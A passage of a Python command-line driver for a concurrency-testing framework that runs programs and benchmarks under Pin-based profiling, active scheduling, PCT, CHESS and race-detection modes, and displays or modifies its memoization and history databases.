iroot_db.display(output)
def __display_memo_exposed_set(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.display_exposed_set(output)
def __display_memo_summary(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.display_summary(output)
def __display_test_history(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
test_history = idiom_history.TestHistory(sinfo, iroot_db)
test_history.load(options.test_history)
test_history.display(output)
def __display_test_history_summary(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
history = idiom_history.TestHistory(sinfo, iroot_db)
history.load(options.test_history)
history.display_summary(output)
def __display_pct_history(output, options):
history = pct_history.History()
history.load(options.pct_history)
history.display(output)
def __display_pct_history_summary(output, options):
history = pct_history.History()
history.load(options.pct_history)
history.display_summary(output)
def valid_display_set():
result = set()
for name in dir(sys.modules[__name__]):
idx = name.find('__display_')
if idx != -1:
result.add(name[idx+10:])
return result
def valid_display(display):
return display in valid_display_set()
def display_usage():
usage = 'usage: <script> display [options] <object>\n\n'
usage += 'valid objects are:\n'
for display in valid_display_set():
usage += ' %s\n' % display
return usage
def register_display_options(parser):
parser.add_option(
'-i', '--input',
action='store',
type='string',
dest='input',
default='stdin',
metavar='PATH',
help='the input file name')
parser.add_option(
'-o', '--output',
action='store',
type='string',
dest='output',
default='stdout',
metavar='PATH',
help='the output file name')
parser.add_option(
'--sinfo_in',
action='store',
type='string',
dest='sinfo_in',
default='sinfo.db',
metavar='PATH',
help='the input static info database path')
parser.add_option(
'--sinfo_out',
action='store',
type='string',
dest='sinfo_out',
default='sinfo.db',
metavar='PATH',
help='the output static info database path')
parser.add_option(
'--iroot_in',
action='store',
type='string',
dest='iroot_in',
default='iroot.db',
metavar='PATH',
help='the input iroot database path')
parser.add_option(
'--iroot_out',
action='store',
type='string',
dest='iroot_out',
default='iroot.db',
metavar='PATH',
help='the output iroot database path')
parser.add_option(
'--memo_in',
action='store',
type='string',
dest='memo_in',
default='memo.db',
metavar='PATH',
help='the input memoization database path')
parser.add_option(
'--memo_out',
action='store',
type='string',
dest='memo_out',
default='memo.db',
metavar='PATH',
help='the output memoization database path')
parser.add_option(
'--test_history',
action='store',
type='string',
dest='test_history',
default='test.histo',
metavar='PATH',
help='the test history path')
parser.add_option(
'--pct_history',
action='store',
type='string',
dest='pct_history',
default='pct.histo',
metavar='PATH',
help='the PCT history path')
def __command_display(argv):
parser = optparse.OptionParser(display_usage())
register_display_options(parser)
(options, args) = parser.parse_args(argv)
if len(args) != 1 or not valid_display(args[0]):
parser.print_help()
sys.exit(0)
# open output
if options.output == 'stdout':
output = sys.stdout
elif options.output == 'stderr':
output = sys.stderr
else:
output = open(options.output, 'w')
# write output
eval('__display_%s(output, options)' % args[0])
# close output
if options.output == 'stdout':
pass
elif options.output == 'stderr':
pass
else:
output.close()
def __modify_memo_input_change(options):
if not os.path.exists(options.memo_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.clear_predicted_set()
memo_db.clear_candidate_map()
memo_db.save(options.memo_out)
logging.msg('memo input change done!\n')
def __modify_memo_mark_unexposed_failed(options):
if not os.path.exists(options.memo_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.mark_unexposed_failed()
memo_db.save(options.memo_out)
logging.msg('memo mark unexposed failed done!\n')
def __modify_memo_refine_candidate(options):
if not os.path.exists(options.memo_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.refine_candidate()
memo_db.save(options.memo_out)
logging.msg('memo refine candidate done!\n')
def __modify_memo_merge(options):
if not os.path.exists(options.memo_in):
return
if not os.path.exists(options.memo_merge_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_merge_db = memo.Memo(sinfo, iroot_db)
memo_merge_db.load(options.memo_merge_in)
memo_db.merge(memo_merge_db)
memo_db.save(options.memo_out)
logging.msg('memo merge done!\n')
def __modify_memo_apply(options):
if not os.path.exists(options.memo_in):
return
if not os.path.exists(options.memo_merge_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_merge_db = memo.Memo(sinfo, iroot_db)
memo_merge_db.load(options.memo_merge_in)
memo_db.merge(memo_merge_db)
memo_db.refine_candidate()
memo_db.save(options.memo_out)
logging.msg('memo apply done!\n')
def valid_modify_set():
result = set()
for name in dir(sys.modules[__name__]):
idx = name.find('__modify_')
if idx != -1:
result.add(name[idx+9:])
return result
def valid_modify(modify):
return modify in valid_modify_set()
def modify_usage():
usage = 'usage: <script> modify [options] <object>\n\n'
usage += 'valid objects are:\n'
for modify in valid_modify_set():
usage += ' %s\n' % modify
return usage
def register_modify_options(parser):
parser.add_option(
'--sinfo_in',
action='store',
type='string',
dest='sinfo_in',
default='sinfo.db',
metavar='PATH',
help='the input static info database path')
parser.add_option(
'--sinfo_out',
action='store',
type='string',
dest='sinfo_out',
default='sinfo.db',
metavar='PATH',
help='the output static info database path')
parser.add_option(
'--iroot_in',
action='store',
type='string',
dest='iroot_in',
default='iroot.db',
metavar='PATH',
help='the input iroot database path')
parser.add_option(
'--iroot_out',
action='store',
type='string',
dest='iroot_out',
default='iroot.db',
metavar='PATH',
help='the output iroot database path')
parser.add_option(
'--memo_in',
action='store',
type='string',
dest='memo_in',
default='memo.db',
metavar='PATH',
help='the input memoization database path')
parser.add_option(
'--memo_out',
action='store',
type='string',
dest='memo_out',
default='memo.db',
metavar='PATH',
help='the output memoization database path')
parser.add_option(
'--memo_merge_in',
action='store',
type='string',
dest='memo_merge_in',
default='memo_merge.db',
metavar='PATH',
help='the to-merge memoization database path')
parser.add_option(
'--no_memo_failed',
action='store_false',
dest='memo_failed',
default=True,
help='whether memorize fail-to-expose iroots')
def __command_modify(argv):
parser = optparse.OptionParser(modify_usage())
register_modify_options(parser)
(options, args) = parser.parse_args(argv)
if len(args) != 1 or not valid_modify(args[0]):
parser.print_help()
sys.exit(0)
eval('__modify_%s(options)' % args[0])
def register_profile_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the profile mode: runout, timeout, stable')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_profile(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
# parse cmdline options
usage = 'usage: <script> profile [options] --- program'
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.ProfileTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def register_active_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the active mode: runout, timeout, finish')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_active(argv):
pin = pintool.Pin(config.pin_home())
scheduler = idiom_pintool.Scheduler()
# parse cmdline options
usage = 'usage: <script> active [options] --- program'
parser = optparse.OptionParser(usage)
register_active_cmdline_options(parser)
scheduler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
scheduler.set_cmdline_options(options, args)
# run active test
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, scheduler))
testcase = idiom_testing.ActiveTestCase(test,
options.mode,
options.threshold,
scheduler)
testcase.run()
def register_random_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the active mode: runout, timeout')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_native(argv):
# parse cmdline options
usage = 'usage: <script> native [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
# run profile
test = testing.InteractiveTest(prog_argv)
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pinbase(argv):
pin = pintool.Pin(config.pin_home())
# parse cmdline options
usage = 'usage: <script> pinbase [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin))
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pct(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['strict'] = True
# parse cmdline options
usage = 'usage: <script> pct [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_pct_large(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
# parse cmdline options
usage = 'usage: <script> pct_large [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_rand_delay(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.RandSchedProfiler()
profiler.knob_defaults['delay'] = True
# parse cmdline options
usage = 'usage: <script> rand_delay [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def register_chess_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='finish',
metavar='MODE',
help='the active mode: finish, runout, timeout')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_chess(argv):
pin = pintool.Pin(config.pin_home())
controller = idiom_pintool.ChessProfiler()
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
# parse cmdline options
usage = 'usage: <script> chess [options] --- program'
parser = optparse.OptionParser(usage)
register_chess_cmdline_options(parser)
controller.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
controller.set_cmdline_options(options, args)
# run chess
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, controller))
testcase = idiom_testing.ChessTestCase(test,
options.mode,
options.threshold,
controller)
testcase.run()
def register_race_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the race detector mode: runout, timeout, stable')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_chess_race(argv):
pin = pintool.Pin(config.pin_home())
profiler = race_pintool.PctProfiler()
profiler.knob_prefix = 'race_'
profiler.knob_defaults['enable_djit'] = True
profiler.knob_defaults['ignore_lib'] = True
profiler.knob_defaults['track_racy_inst'] = True
controller = idiom_pintool.ChessProfiler()
controller.knob_prefix = 'chess_'
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
controller.knob_defaults['sched_race'] = True
# parse cmdline options
usage = 'usage: <script> chess_race [options] --- program'
parser = optparse.OptionParser(usage)
register_race_cmdline_options(parser, 'race_')
profiler.register_cmdline_options(parser)
register_chess_cmdline_options(parser, 'chess_')
controller.register_cmdline_options(parser)
parser.set_defaults(race_mode='stable')
parser.set_defaults(race_threshold=3)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
controller.set_cmdline_options(options, args)
# create race testcase
race_test = testing.InteractiveTest(prog_argv)
race_test.set_prefix(get_prefix(pin, profiler))
race_testcase = idiom_testing.RaceTestCase(race_test,
options.race_mode,
options.race_threshold,
profiler)
# create chess testcase
chess_test = testing.InteractiveTest(prog_argv)
chess_test.set_prefix(get_prefix(pin, controller))
chess_testcase = idiom_testing.ChessTestCase(chess_test,
options.chess_mode,
options.chess_threshold,
controller)
# run
testcase = idiom_testing.ChessRaceTestCase(race_testcase,
chess_testcase)
testcase.run()
def __command_default(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_prefix = 'profile_'
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
scheduler = idiom_pintool.Scheduler()
scheduler.knob_prefix = 'active_'
# parse cmdline options
usage = 'usage: <script> default [options] --- program'
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser, 'profile_')
profiler.register_cmdline_options(parser)
register_active_cmdline_options(parser, 'active_')
scheduler.register_cmdline_options(parser)
parser.set_defaults(profile_mode='stable')
parser.set_defaults(profile_threshold=3)
parser.set_defaults(active_mode='finish')
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
scheduler.set_cmdline_options(options, args)
# create profile testcase
profile_test = testing.InteractiveTest(prog_argv)
profile_test.set_prefix(get_prefix(pin, profiler))
profile_testcase = idiom_testing.ProfileTestCase(profile_test,
options.profile_mode,
options.profile_threshold,
profiler)
# create active testcase
active_test = testing.InteractiveTest(prog_argv)
active_test.set_prefix(get_prefix(pin, scheduler))
active_testcase = idiom_testing.ActiveTestCase(active_test,
options.active_mode,
options.active_threshold,
scheduler)
# run idiom testcase
idiom_testcase = idiom_testing.IdiomTestCase(profile_testcase,
active_testcase)
idiom_testcase.run()
def valid_benchmark_set():
result = set()
path = config.pkg_home() + '/script/maple/benchmark'
for f in os.listdir(path):
if f.endswith('.py'):
if f != '__init__.py':
result.add(f[:-3])
return result
def valid_benchmark(bench):
return bench in valid_benchmark_set()
def benchmark_usage():
usage = 'valid benchmarks are:\n'
for bench in valid_benchmark_set():
usage += ' %s\n' % bench
return usage
def __command_profile_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
# parse cmdline options
usage = 'usage: <script> profile_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.ProfileTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_active_script(argv):
pin = pintool.Pin(config.pin_home())
scheduler = idiom_pintool.Scheduler()
# parse cmdline options
usage = 'usage: <script> active_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_active_cmdline_options(parser)
scheduler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
scheduler.set_cmdline_options(options, args)
# run active test
__import__('maple.benchmark.%s' % bench_name)
bench_mod = sys.modules['maple.benchmark.%s' % bench_name]
test = bench_mod.get_test(input_idx)
test.set_prefix(get_prefix(pin, scheduler))
testcase = idiom_testing.ActiveTestCase(test,
options.mode,
options.threshold,
scheduler)
testcase.run()
def __command_native_script(argv):
# parse cmdline options
usage = 'usage: <script> native_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pinbase_script(argv):
pin = pintool.Pin(config.pin_home())
# parse cmdline options
usage = 'usage: <script> pinbase_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin))
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pct_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['strict'] = True
# parse cmdline options
usage = 'usage: <script> pct_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_pct_large_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
# parse cmdline options
usage = 'usage: <script> pct_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_rand_delay_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.RandSchedProfiler()
profiler.knob_defaults['delay'] = True
# parse cmdline options
usage = 'usage: <script> rand_delay_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_chess_script(argv):
pin = pintool.Pin(config.pin_home())
controller = idiom_pintool.ChessProfiler()
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
# parse cmdline options
usage = 'usage: <script> chess_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_chess_cmdline_options(parser)
controller.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
controller.set_cmdline_options(options, args)
# run chess
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, controller))
testcase = idiom_testing.ChessTestCase(test,
options.mode,
options.threshold,
controller)
testcase.run()
def __command_chess_race_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = race_pintool.PctProfiler()
profiler.knob_prefix = 'race_'
profiler.knob_defaults['enable_djit'] = True
profiler.knob_defaults['ignore_lib'] = True
profiler.knob_defaults['track_racy_inst'] = True
controller = idiom_pintool.ChessProfiler()
controller.knob_prefix = 'chess_'
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
controller.knob_defaults['sched_race'] = True
# parse cmdline options
usage = 'usage: <script> chess_race_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_race_cmdline_options(parser, 'race_')
profiler.register_cmdline_options(parser)
register_chess_cmdline_options(parser, 'chess_')
controller.register_cmdline_options(parser)
parser.set_defaults(race_mode='stable')
parser.set_defaults(race_threshold=3)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
controller.set_cmdline_options(options, args)
# create race testcase
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
race_test = bench.get_test(input_idx)
race_test.set_prefix(get_prefix(pin, profiler))
race_testcase = idiom_testing.RaceTestCase(race_test,
options.race_mode,
options.race_threshold,
profiler)
# create chess testcase
chess_test = bench.get_test(input_idx)
chess_test.set_prefix(get_prefix(pin, controller))
chess_testcase = idiom_testing.ChessTestCase(chess_test,
options.chess_mode,
options.chess_threshold,
controller)
# run
testcase = idiom_testing.ChessRaceTestCase(race_testcase,
chess_testcase)
testcase.run()
def __command_default_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_prefix = 'profile_'
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
scheduler = idiom_pintool.Scheduler()
scheduler.knob_prefix = 'active_'
# parse cmdline options
usage = 'usage: <script> default_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser, 'profile_')
profiler.register_cmdline_options(parser)
register_active_cmdline_options(parser, 'active_')
scheduler.register_cmdline_options(parser)
parser.set_defaults(profile_mode='stable')
parser.set_defaults(profile_threshold=3)
parser.set_defaults(active_mode='finish')
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
scheduler.set_cmdline_options(options, args)
# create profile testcase
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
profile_test = bench.get_test(input_idx)
profile_test.set_prefix(get_prefix(pin, profiler))
profile_testcase = idiom_testing.ProfileTestCase(profile_test,
options.profile_mode,
options.profile_threshold,
profiler)
# create active testcase
active_test = bench.get_test(input_idx)
active_test.set_prefix(get_prefix(pin, scheduler))
active_testcase = idiom_testing.ActiveTestCase(active_test,
options.active_mode,
options.active_threshold,
scheduler)
# run idiom testcase
idiom_testcase = idiom_testing.IdiomTestCase(profile_testcase,
active_testcase)
idiom_testcase.run()
def __command_memo_tool(argv):
usage = 'usage: <script> memo_tool --operation=OP [options]'
parser = optparse.OptionParser(usage)
memo_tool = idiom_offline_tool.MemoTool()
memo_tool.register_cmdline_options(parser)
(options, args) = parser.parse_args(argv)
memo_tool.set_cmdline_options(options, args)
memo_tool.call()
def valid_command_set():
result = set()
for name in dir(sys.modules[__name__]):
idx = name.find('__command_')
if idx != -1:
result.add(name[idx+10:])
return result
def valid_command(command):
return command in valid_command_set()
def command_usage():
usage = 'usage: <script> <command> [options] [args]\n\n'
usage += 'valid commands are:\n'
for command in valid_command_set():
usage += ' %s\n' % command
return usage
def main(argv):
if len(argv) < 1:
logging.err(command_usage())
command = argv[0]
logging.msg('performing command: %s ...\n' % command, 2)
if valid_command(command):
eval('__command_%s(argv[1:])' % command)
else:
logging.err(command_usage())
if __name__ == '__main__':
main(sys.argv[1:])
